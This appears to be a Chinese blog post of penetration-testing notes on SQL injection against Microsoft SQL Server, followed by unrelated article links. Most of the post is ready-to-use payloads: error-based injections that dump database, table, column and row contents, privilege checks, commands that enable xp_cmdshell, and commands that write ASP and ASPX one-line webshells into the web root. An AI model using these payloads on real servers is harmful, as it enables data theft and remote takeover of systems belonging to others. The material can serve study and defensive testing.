MSsql数据库 sql注入

I_WORM2024-04-09 20:04

  • 和mysql不同;每个数据库都有自己的信息总结表

  • 四个系统数据库

    • master

      • sysdatabases :所有数据库信息
        • name :所有数据库名
      • sysobjects :数据库所有对象的信息
      • syscolumns :字段信息

      • 固定字段名

        • name 对象名
        • id 对象id

        • xtype 对象类型代码

          • xtype='U' 用户创建的表
          • xtype='S' 系统表

    • model

      • sysobjects
      • syscolumns

    • msdb

      • sysobjects
      • syscolumns

    • tempdb

      • sysobjects
      • syscolumns

  • 用户自己创建的数据库也会自动携带下面字段

    • sysobjects
    • syscolumns

  • 常用函数

    • db_name() :数据库名
    • host_name() :主机名
    • current_user :返回数据库当前的用户名
    • user :用户
    • substring() :截取函数;不能用substr()
    • @@verison :查看数据库版本
    • char() :ascii码转字符
    • cast(text as type() :字符类型转换;转化失败就会以text结果显示在页面上
    • object_id() :根据表名返回数据库表名id
    • object_name() :根据id返回数据库表名
    • col_name(object_id,column_id) :返回指定表中指定字段的名称
    • col_name(object_id('users'),2)

  • 调用表名

    • 数据库名.用户名.表名

  • 报错注入

    • 'or 1=convert(int,@@version)--
    • 1-user
    • 1/user
    • convert(int,user)
    • db_name()

  • 注入流程

    • 判断权限

      • 权限:sa 、db_owner 、public
      • and 1=(select IS_SRVROLEMEMBER('sysadmin')) --
      • and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
      • and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
      • and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
      • and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
      • and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
      • and 1=(select IS_MEMBER('db_owner'));-
    • 获取当前数据库
      • and 1=(select db_name()) --
    • 获取当前数据库的表名
      • and 1=convert(int,(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))) --
    • 获取当前数据库中表的所有字段
      • and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
    • 读取内容
      • and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--

  • 命令执行

    • 开启xp_cmdshell,0为关闭,1为开启
      • ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE; --
    • 关闭xp_cmdshell
      • ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE; --

    • 执行ping判断是否能执行xp_cmdshell和服务器是否通外网

      • ;execute('xp_cmdshell ""')

    • 写入一句话木马;需要知道网站根目录

      • asp
        • ;exec master..xp_cmdshell 'echo ^<%25eval request(1234)%25^> > C:\Inetpub\wwwroot\test.asp' --
      • aspx
        • ;exec master..xp_cmdshell 'echo ^<%25@ Page Language="Jscript"%25^>^<%25eval(Request.Item["aaa"],"unsafe");%25^> > C:\Inetpub\wwwroot\test.aspx' --
相关推荐
gma99926 分钟前
Etcd 框架
数据库·etcd
爱吃青椒不爱吃西红柿‍️29 分钟前
华为ASP与CSP是什么?
服务器·前端·数据库
Yz98761 小时前
hive的存储格式
大数据·数据库·数据仓库·hive·hadoop·数据库开发
苏-言1 小时前
Spring IOC实战指南:从零到一的构建过程
java·数据库·spring
Ljw...1 小时前
索引(MySQL)
数据库·mysql·索引
菠萝咕噜肉i2 小时前
超详细:Redis分布式锁
数据库·redis·分布式·缓存·分布式锁
长风清留扬2 小时前
一篇文章了解何为 “大数据治理“ 理论与实践
大数据·数据库·面试·数据治理
Mephisto.java2 小时前
【大数据学习 | Spark】Spark的改变分区的算子
大数据·elasticsearch·oracle·spark·kafka·memcache
OpsEye2 小时前
MySQL 8.0.40版本自动升级异常的预警提示
数据库·mysql·数据库升级
Ljw...2 小时前
表的增删改查(MySQL)
数据库·后端·mysql·表的增删查改
热门推荐
01(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明02PyTorch机器学习实现液态神经网络03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总04玄机平台应急响应—webshell查杀05Coze扣子平台完整体验和实践(附国内和国际版对比)06Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO07【目标跟踪】相机运动补偿08Unity中PICO实现 隔空取物 和 接触抓取物体09RAG 实践- Ollama+RagFlow 部署本地知识库10量化方法怎么选?如何评估量化后的大模型LLM?